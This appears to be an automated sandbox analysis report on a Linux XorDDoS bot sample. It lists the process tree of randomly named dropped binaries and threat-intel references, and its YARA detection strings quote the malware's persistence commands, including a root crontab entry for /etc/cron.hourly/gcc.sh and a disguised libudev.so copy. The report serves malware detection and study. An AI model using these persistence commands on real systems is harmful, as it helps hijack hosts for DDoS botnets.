
glxnohbcpa New Fork (PID: 5745, Parent: 5744)

eTASxT3bjO.elf New Fork (PID: 5746, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5747, Parent: 5746)

glxnohbcpa (PID: 5747, Parent: 5746, MD5: 75de2ec4c7a2f7ea217f0c93a872a2ce) Arguments: /usr/bin/glxnohbcpa whoami 5434

glxnohbcpa New Fork (PID: 5751, Parent: 5747)

eTASxT3bjO.elf New Fork (PID: 5748, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5749, Parent: 5748)

glxnohbcpa (PID: 5749, Parent: 5748, MD5: 75de2ec4c7a2f7ea217f0c93a872a2ce) Arguments: /usr/bin/glxnohbcpa who 5434

glxnohbcpa New Fork (PID: 5755, Parent: 5749)

eTASxT3bjO.elf New Fork (PID: 5750, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5752, Parent: 5750)

glxnohbcpa (PID: 5752, Parent: 5750, MD5: 75de2ec4c7a2f7ea217f0c93a872a2ce) Arguments: /usr/bin/glxnohbcpa "grep \"A\"" 5434

glxnohbcpa New Fork (PID: 5756, Parent: 5752)

eTASxT3bjO.elf New Fork (PID: 5753, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5754, Parent: 5753)

glxnohbcpa (PID: 5754, Parent: 5753, MD5: 75de2ec4c7a2f7ea217f0c93a872a2ce) Arguments: /usr/bin/glxnohbcpa "netstat -an" 5434

glxnohbcpa New Fork (PID: 5757, Parent: 5754)

eTASxT3bjO.elf New Fork (PID: 5760, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5761, Parent: 5760)

wircfeaxij (PID: 5761, Parent: 5760, MD5: 4d0380946214d5b0447e4c2ff88e0486) Arguments: /usr/bin/wircfeaxij who 5434

wircfeaxij New Fork (PID: 5762, Parent: 5761)

eTASxT3bjO.elf New Fork (PID: 5763, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5764, Parent: 5763)

wircfeaxij (PID: 5764, Parent: 5763, MD5: 4d0380946214d5b0447e4c2ff88e0486) Arguments: /usr/bin/wircfeaxij "grep \"A\"" 5434

wircfeaxij New Fork (PID: 5767, Parent: 5764)

eTASxT3bjO.elf New Fork (PID: 5765, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5766, Parent: 5765)

wircfeaxij (PID: 5766, Parent: 5765, MD5: 4d0380946214d5b0447e4c2ff88e0486) Arguments: /usr/bin/wircfeaxij bash 5434

wircfeaxij New Fork (PID: 5771, Parent: 5766)

eTASxT3bjO.elf New Fork (PID: 5768, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5769, Parent: 5768)

wircfeaxij (PID: 5769, Parent: 2935, MD5: 4d0380946214d5b0447e4c2ff88e0486) Arguments: /usr/bin/wircfeaxij "cd /etc" 5434

wircfeaxij New Fork (PID: 5773, Parent: 5769)

eTASxT3bjO.elf New Fork (PID: 5770, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5772, Parent: 5770)

wircfeaxij (PID: 5772, Parent: 2935, MD5: 4d0380946214d5b0447e4c2ff88e0486) Arguments: /usr/bin/wircfeaxij ls 5434

wircfeaxij New Fork (PID: 5774, Parent: 5772)

eTASxT3bjO.elf New Fork (PID: 5777, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5778, Parent: 5777)

hvajrjqgqs (PID: 5778, Parent: 2935, MD5: 19dfe465c483f7cbdba565017bfb9d71) Arguments: /usr/bin/hvajrjqgqs bash 5434

hvajrjqgqs New Fork (PID: 5783, Parent: 5778)

eTASxT3bjO.elf New Fork (PID: 5779, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5780, Parent: 5779)

hvajrjqgqs (PID: 5780, Parent: 2935, MD5: 19dfe465c483f7cbdba565017bfb9d71) Arguments: /usr/bin/hvajrjqgqs "grep \"A\"" 5434

hvajrjqgqs New Fork (PID: 5786, Parent: 5780)

eTASxT3bjO.elf New Fork (PID: 5781, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5782, Parent: 5781)

hvajrjqgqs (PID: 5782, Parent: 2935, MD5: 19dfe465c483f7cbdba565017bfb9d71) Arguments: /usr/bin/hvajrjqgqs "cd /etc" 5434

hvajrjqgqs New Fork (PID: 5789, Parent: 5782)

eTASxT3bjO.elf New Fork (PID: 5784, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5785, Parent: 5784)

hvajrjqgqs (PID: 5785, Parent: 2935, MD5: 19dfe465c483f7cbdba565017bfb9d71) Arguments: /usr/bin/hvajrjqgqs sh 5434

hvajrjqgqs New Fork (PID: 5790, Parent: 5785)

eTASxT3bjO.elf New Fork (PID: 5787, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5788, Parent: 5787)

hvajrjqgqs (PID: 5788, Parent: 2935, MD5: 19dfe465c483f7cbdba565017bfb9d71) Arguments: /usr/bin/hvajrjqgqs id 5434

hvajrjqgqs New Fork (PID: 5791, Parent: 5788)

eTASxT3bjO.elf New Fork (PID: 5794, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5795, Parent: 5794)

vopwilkkdb (PID: 5795, Parent: 2935, MD5: 0f40531914c46b563c96af8d96886016) Arguments: /usr/bin/vopwilkkdb id 5434

vopwilkkdb New Fork (PID: 5803, Parent: 5795)

eTASxT3bjO.elf New Fork (PID: 5796, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5797, Parent: 5796)

vopwilkkdb (PID: 5797, Parent: 2935, MD5: 0f40531914c46b563c96af8d96886016) Arguments: /usr/bin/vopwilkkdb "cat resolv.conf" 5434

vopwilkkdb New Fork (PID: 5799, Parent: 5797)

eTASxT3bjO.elf New Fork (PID: 5798, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5800, Parent: 5798)

vopwilkkdb (PID: 5800, Parent: 2935, MD5: 0f40531914c46b563c96af8d96886016) Arguments: /usr/bin/vopwilkkdb whoami 5434

vopwilkkdb New Fork (PID: 5806, Parent: 5800)

eTASxT3bjO.elf New Fork (PID: 5801, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5802, Parent: 5801)

vopwilkkdb (PID: 5802, Parent: 2935, MD5: 0f40531914c46b563c96af8d96886016) Arguments: /usr/bin/vopwilkkdb sh 5434

vopwilkkdb New Fork (PID: 5807, Parent: 5802)

eTASxT3bjO.elf New Fork (PID: 5804, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5805, Parent: 5804)

vopwilkkdb (PID: 5805, Parent: 2935, MD5: 0f40531914c46b563c96af8d96886016) Arguments: /usr/bin/vopwilkkdb sh 5434

vopwilkkdb New Fork (PID: 5808, Parent: 5805)

eTASxT3bjO.elf New Fork (PID: 5813, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5814, Parent: 5813)

bqdemabuld (PID: 5814, Parent: 2935, MD5: f9709c862f5a03fa9407ecba4f48204d) Arguments: /usr/bin/bqdemabuld gnome-terminal 5434

bqdemabuld New Fork (PID: 5819, Parent: 5814)

eTASxT3bjO.elf New Fork (PID: 5815, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5816, Parent: 5815)

bqdemabuld (PID: 5816, Parent: 2935, MD5: f9709c862f5a03fa9407ecba4f48204d) Arguments: /usr/bin/bqdemabuld "ifconfig eth0" 5434

bqdemabuld New Fork (PID: 5822, Parent: 5816)

eTASxT3bjO.elf New Fork (PID: 5817, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5818, Parent: 5817)

bqdemabuld (PID: 5818, Parent: 2935, MD5: f9709c862f5a03fa9407ecba4f48204d) Arguments: /usr/bin/bqdemabuld id 5434

bqdemabuld New Fork (PID: 5825, Parent: 5818)

eTASxT3bjO.elf New Fork (PID: 5820, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5821, Parent: 5820)

bqdemabuld (PID: 5821, Parent: 5820, MD5: f9709c862f5a03fa9407ecba4f48204d) Arguments: /usr/bin/bqdemabuld sh 5434

bqdemabuld New Fork (PID: 5826, Parent: 5821)

eTASxT3bjO.elf New Fork (PID: 5823, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5824, Parent: 5823)

bqdemabuld (PID: 5824, Parent: 2935, MD5: f9709c862f5a03fa9407ecba4f48204d) Arguments: /usr/bin/bqdemabuld "cat resolv.conf" 5434

bqdemabuld New Fork (PID: 5827, Parent: 5824)

eTASxT3bjO.elf New Fork (PID: 5831, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5832, Parent: 5831)

btbrmdkijd (PID: 5832, Parent: 2935, MD5: 40acb49ea1ca4eb792b90a95622521f4) Arguments: /usr/bin/btbrmdkijd "ifconfig eth0" 5434

btbrmdkijd New Fork (PID: 5837, Parent: 5832)

eTASxT3bjO.elf New Fork (PID: 5833, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5834, Parent: 5833)

btbrmdkijd (PID: 5834, Parent: 2935, MD5: 40acb49ea1ca4eb792b90a95622521f4) Arguments: /usr/bin/btbrmdkijd "cat resolv.conf" 5434

btbrmdkijd New Fork (PID: 5841, Parent: 5834)

eTASxT3bjO.elf New Fork (PID: 5835, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5836, Parent: 5835)

btbrmdkijd (PID: 5836, Parent: 2935, MD5: 40acb49ea1ca4eb792b90a95622521f4) Arguments: /usr/bin/btbrmdkijd gnome-terminal 5434

btbrmdkijd New Fork (PID: 5843, Parent: 5836)

eTASxT3bjO.elf New Fork (PID: 5838, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5839, Parent: 5838)

btbrmdkijd (PID: 5839, Parent: 2935, MD5: 40acb49ea1ca4eb792b90a95622521f4) Arguments: /usr/bin/btbrmdkijd "cat resolv.conf" 5434

btbrmdkijd New Fork (PID: 5844, Parent: 5839)

eTASxT3bjO.elf New Fork (PID: 5840, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5842, Parent: 5840)

btbrmdkijd (PID: 5842, Parent: 2935, MD5: 40acb49ea1ca4eb792b90a95622521f4) Arguments: /usr/bin/btbrmdkijd pwd 5434

btbrmdkijd New Fork (PID: 5845, Parent: 5842)

eTASxT3bjO.elf New Fork (PID: 5848, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5849, Parent: 5848)

hvcnxeaxdt (PID: 5849, Parent: 5848, MD5: 9b3751de544e55a80ad32cf965ebd9b5) Arguments: /usr/bin/hvcnxeaxdt "ps -ef" 5434

hvcnxeaxdt New Fork (PID: 5855, Parent: 5849)

eTASxT3bjO.elf New Fork (PID: 5850, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5851, Parent: 5850)

hvcnxeaxdt (PID: 5851, Parent: 2935, MD5: 9b3751de544e55a80ad32cf965ebd9b5) Arguments: /usr/bin/hvcnxeaxdt ifconfig 5434

hvcnxeaxdt New Fork (PID: 5859, Parent: 5851)

eTASxT3bjO.elf New Fork (PID: 5852, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5853, Parent: 5852)

hvcnxeaxdt (PID: 5853, Parent: 2935, MD5: 9b3751de544e55a80ad32cf965ebd9b5) Arguments: /usr/bin/hvcnxeaxdt id 5434

hvcnxeaxdt New Fork (PID: 5860, Parent: 5853)

eTASxT3bjO.elf New Fork (PID: 5854, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5856, Parent: 5854)

hvcnxeaxdt (PID: 5856, Parent: 2935, MD5: 9b3751de544e55a80ad32cf965ebd9b5) Arguments: /usr/bin/hvcnxeaxdt whoami 5434

hvcnxeaxdt New Fork (PID: 5861, Parent: 5856)

eTASxT3bjO.elf New Fork (PID: 5857, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5858, Parent: 5857)

hvcnxeaxdt (PID: 5858, Parent: 2935, MD5: 9b3751de544e55a80ad32cf965ebd9b5) Arguments: /usr/bin/hvcnxeaxdt id 5434

hvcnxeaxdt New Fork (PID: 5862, Parent: 5858)

systemd New Fork (PID: 5446, Parent: 5445)

snapd-env-generator (PID: 5446, Parent: 5445, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XOR DDoS, XORDDOS	Linux DDoS C&C Malware	No Attribution	http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
eTASxT3bjO.elf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
eTASxT3bjO.elf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
eTASxT3bjO.elf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
eTASxT3bjO.elf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/ygqhgbaeei	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ygqhgbaeei	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ygqhgbaeei	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ygqhgbaeei	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/kffnhivjdw	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/svkksitypo	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/kffnhivjdw	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/kffnhivjdw	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/svkksitypo	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/svkksitypo	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/kffnhivjdw	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/svkksitypo	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/eoogzzilvp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/eoogzzilvp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/eoogzzilvp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/eoogzzilvp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/xjdcsmwtwe	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/xjdcsmwtwe	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/xjdcsmwtwe	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/xjdcsmwtwe	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/evbjclrakz	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/evbjclrakz	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/evbjclrakz	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/evbjclrakz	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wvicexcnqi	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wvicexcnqi	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wvicexcnqi	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/zqylkjndwx	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zqylkjndwx	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/zqylkjndwx	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/zqylkjndwx	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mqnpjwpasf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/mqnpjwpasf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/mqnpjwpasf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/mqnpjwpasf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/lib/libudev.so	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/yfaogzsdtv	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/yfaogzsdtv	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/yfaogzsdtv	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/yfaogzsdtv	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/xaxopmwzau	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/xaxopmwzau	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/xaxopmwzau	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/vijnytmbcx	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/xaxopmwzau	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/vijnytmbcx	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/vijnytmbcx	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/vijnytmbcx	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/uruvhkrplh	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/uruvhkrplh	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/uruvhkrplh	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
